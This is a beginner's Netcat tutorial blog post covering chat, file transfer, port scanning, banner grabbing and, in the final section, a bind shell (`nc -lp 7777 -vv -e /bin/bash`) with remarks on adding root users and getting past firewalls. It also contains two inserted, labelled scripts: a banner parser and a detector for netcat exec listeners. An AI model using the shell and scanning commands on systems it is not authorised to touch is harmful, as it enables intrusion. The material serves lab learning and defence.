
What Holds the Hacker's Heart? NetCat

By: Mr. Sirja
May 30, 2017
Hello, Cybrarians! Do you know what NetCat is? We can say NetCat is the heart of hackers, pentesters and security ninjas. It first surfaced in 1995, and it is one of the most popular and most lightweight network security tools. Netcat lets computers transfer data to each other over the TCP and UDP protocols.
We'll learn some basic uses of Netcat, such as a chat or messaging server, file transfer, banner grabbing (for finding the operating system, services, versions, etc.), port scanning and more. I've divided this tutorial into 5 sections:
  1.  Chat Between Two Machines with Netcat
  2.  Transfer Files  Between Two Machines
  3.  Port scanning
  4.  Banner Grabbing
  5.  Remote shells from Ubuntu into Kali Linux
Let's learn briefly about each section without wasting time.
1. Chat Between Two Machines with Netcat:
  • We can use Netcat as a simple chat interface. You can use two instances of Netcat running on one computer, on any operating system you want. Of the two instances, one will be the listener and the other will be the client. I will be connecting over TCP port 7777. Here, 7777 is the port number where the Netcat service will run.
  • First of all, we start with our listener machine. On the listener machine, type nc -l -p 7777 , where 7777 can be any port you choose.
  • Let's go deeper into this command:
    nc = Netcat
    -l = Listen mode, for inbound connections
    -p = Port on which Netcat will listen for a new connection
This machine listening for new connection
  • Now, check the IP address of the listener machine. Type ifconfig on the Ubuntu machine.
IP address of listener machine
  • Now, on the client machine, type nc 10.0.1.102 7777 and press Enter, where 10.0.1.102 is the listener machine's IP address. This opens the other end of the connection as the client.
Client Machine
  • Now, type a message and check the listener machine.
Listener machine get message
  • Note that it's completely unencrypted, but it does let you chat.
2. Transfer Files  Between Two Machines:
  • Now that we have a basic knowledge of Netcat, we can move on to transferring files between two machines.
  • Suppose I have two machines. One is Ubuntu and the other is Kali Linux, and I want to transfer the netcat.txt file from the Kali Linux machine to my Ubuntu machine.
  • Make the machine that should receive the file the listener by typing the command below:
  • nc -v -w 30 -l -p 7777 > netcat.txt
  • Let's go deeper into this command:
    -v = Verbose. It gives you feedback on the screen during an operation.
    -w 30 = Netcat waits 30 seconds before timing out after the transfer is initiated, and also terminates the connection 30 seconds after the transfer is complete.
    -l = This PC should be the listener.
    > netcat.txt = This machine listens for that file and writes what it receives to netcat.txt.
Machine is listening for netcat.txt file
  • Now, on the Kali Linux machine, type the following command in the terminal and press Enter:
  • nc -v -w 4 192.168.1.6 7777 < netcat.txt
  • Here -w 4 means Netcat will wait 4 seconds before canceling the transfer if the connection is lost.
Transferring file from kali linux to ubuntu machine
  • Now, look at the listener machine. You can see that netcat.txt file is transferred.
File received
3. Port Scanning:
  • When you think about port scanning, which programs first come to mind? Nmap or Angry IP Scanner, right?
  • Netcat is not an advanced program for port scanning like Nmap. Netcat can perform a very basic scan for open ports. Let's check this out.
  • Type the command below in the terminal:
  • nc -v -w 5 10.0.1.101 -z 1-1000
  • Here, Netcat scans the range of ports from 1 to 1000 and gives the result.
  • Here, I am using the Kali Linux machine for the port scan.
Port scan result - here 1 port is open
4. Banner Grabbing:
  • Banner grabbing is a little bit more complex than the others.
  • It is useful for penetration testing on a specific port, or when you need to find out what version or patches are running on a server.
  • Type nc 10.0.1.101 80, press Enter, and then type:
  • HTTP/1.1 200 and press Enter.
  • You can also grab banners by domain name. Type the following command:
  • nc www.google.com 80
  • GET / HTTP/1.1
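What the banner from the steps above reveals, as an added example that is not part of the original post: a shell function that reads a raw HTTP response, such as the one nc prints, and reports the status line plus the Server and X-Powered-By headers, marking values that contain a version number. The function names and both sample responses are constructed for illustration; use it to check what your own server discloses.

```sh
#!/bin/sh
# Added example, not from the original post. Reads a raw HTTP response on
# stdin and reports the headers that make up the "banner".
banner_fields() {
    awk '
    { sub(/\r$/, "") }                      # HTTP lines end in CRLF
    NR == 1  { print "status: " $0; next }  # status line
    $0 == "" { exit }                       # blank line: headers are over
    {
        sep = index($0, ":")
        if (sep == 0) next
        name  = tolower(substr($0, 1, sep - 1))   # header names are case-insensitive
        value = substr($0, sep + 1)
        sub(/^[ \t]+/, "", value)
        if (name == "server" || name == "x-powered-by") {
            # Heuristic (assumption): a digit in the value means a version leaks.
            note = (value ~ /[0-9]/) ? "version exposed" : "no version"
            printf "%s: %s [%s]\n", name, value, note
        }
    }'
}

# Constructed sample: default configuration answering a malformed request.
default_response() {
    printf 'HTTP/1.1 400 Bad Request\r\n'
    printf 'Server: Apache/2.4.18 (Ubuntu)\r\n'
    printf 'X-Powered-By: PHP/7.0.15\r\n'
    printf 'Content-Type: text/html\r\n\r\n'
    printf '<p>Server: this line is body text, not a header</p>\r\n'
}

# Constructed sample: same server with version details suppressed.
hardened_response() {
    printf 'HTTP/1.1 400 Bad Request\r\n'
    printf 'server: Apache\r\n'
    printf 'Content-Type: text/html\r\n\r\n'
}

default_response  | banner_fields
echo "---"
hardened_response | banner_fields
```

Parsing stops at the first blank line, so text in the response body that merely looks like a header is never reported.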
5. Remote shells from Ubuntu into Kali Linux:
  • For this, we need sudo permission to get the remote shell on the Kali Linux machine.
  • This is one of my favorite features of Netcat.
  • A remote shell is like a command-line program such as cmd or a terminal.
  • On the Ubuntu machine, type: nc -lp 7777 -vv -e /bin/bash
  • On the Kali Linux machine, type: nc 10.0.1.102 7777 and press Enter.
  • Yeah, great! We have a remote shell of the Ubuntu machine on the Kali Linux machine. So you can make files, copy and move files, remove files and so many other things.
Got shell in Kali Linux
  • Note that Netcat can also run a remote shell from another port through a server outside of a firewall. So it's not recommended that both machines be on the same network.
  • So we can do anything with this remote shell. We can also add a root user on the Ubuntu machine with it.
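From the defender's side, the listener in this section is easy to spot in a process listing. The following added example (not part of the original post) scans the output of ps -eo pid,user,args for netcat started with an exec option (-e or -c, or Ncat's --exec and --sh-exec) and reports the PID, user, port and program; the function names and the process listing are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post. Flags netcat processes started
# with an exec option, like the listener in section 5.
# Input: lines in the format printed by `ps -eo pid,user,args`.
find_nc_exec() {
    awk '
    $1 == "PID" { next }                       # skip the ps header
    {
        prog = $3
        sub(/^.*\//, "", prog)                 # drop any directory prefix
        if (prog !~ /^(nc|ncat|netcat|nc\.traditional)$/) next
        port = "?"; target = ""
        for (i = 4; i <= NF; i++) {
            # Long exec options as spelled by Ncat.
            if ($i == "--exec" || $i == "--sh-exec") { target = $(i + 1); continue }
            if ($i !~ /^-[A-Za-z]+$/) continue  # not a short-option cluster
            # The last letter of a cluster takes the next word as its value:
            # -p PORT, -e PROGRAM, -c COMMAND.
            if ($i ~ /p$/)    port   = $(i + 1)
            if ($i ~ /[ec]$/) target = $(i + 1)
        }
        if (target != "") printf "%s %s port=%s exec=%s\n", $1, $2, port, target
    }'
}

# Constructed process listing for the demonstration.
sample_ps() {
    cat <<'EOF'
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1977 alice    grep -e bash notes.txt
 2291 alice    nc -lp 7777 -vv -e /bin/bash
 2304 alice    nc -v -w 30 -l -p 7777
 2410 root     /bin/nc.traditional -l -p 4444 -e /bin/sh
EOF
}

sample_ps | find_nc_exec
```

On a live host, pipe the real ps output into find_nc_exec instead of the sample; the plain file-transfer listener (PID 2304 in the sample) is deliberately not flagged because it runs no program.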
 
Have questions or comments about what I said? Feel free to comment and I will reply as soon as possible.
You can have lots of fun with Netcat, including chat, transferring files, banner grabbing and port scanning, and the best one is the remote shell. I also want to know how you guys use Netcat. If you know something extra, please comment below, and if you like my tutorial, share it with your friends and family. Happy Hacking ...
